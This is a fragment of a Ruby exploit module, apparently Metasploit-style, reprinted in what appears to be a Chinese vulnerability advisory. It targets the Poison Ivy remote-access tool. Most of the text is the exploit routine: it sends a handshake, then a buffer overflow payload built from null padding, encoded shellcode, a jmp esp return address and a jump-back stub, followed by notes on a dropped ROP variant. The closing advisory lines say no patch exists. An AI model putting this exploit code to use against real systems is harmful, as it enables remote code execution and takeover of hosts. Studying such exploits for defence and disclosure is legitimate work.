def do_exploit(header)
# Handshake
connect
print_status("Performing handshake...")
sock.put("\x00" * 256)
sock.get
# Don't change the nulls, or it might not work
xploit = ''
xploit << header
xploit << "\x00" * (target['PayloadOffset'] - xploit.length)
xploit << payload.encoded
xploit << "\x00" * (target['Offset'] - xploit.length)
xploit << [target.ret].pack("V") # ret to a jmp esp opcode
xploit << [target['RWAddress']].pack("V") # Readable/writeable - will be cleaned by original ret 4 (esp will point to the next dword)
xploit << target['jmpPayload'] # This comes immediately after ret - it is a setup for the payload (jmp back)
# The disconnection triggers the exploit
print_status("Sending exploit...")
sock.put(xploit)
select(nil,nil,nil,5)
disconnect
end
end
=begin
* ROP version of exploit(): Has been discarded at the moment because of two reasons:
(1) Poison Ivy fails to run on DEP enabled systems (maybe due to the unpacking process)
(2) When trying a unpacked version on DEP enabled systems windows/exec payload runs, but not meterpreter
=end
建议:
--------------------------------------------------------------------------------
厂商补丁:
Poison Ivy
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: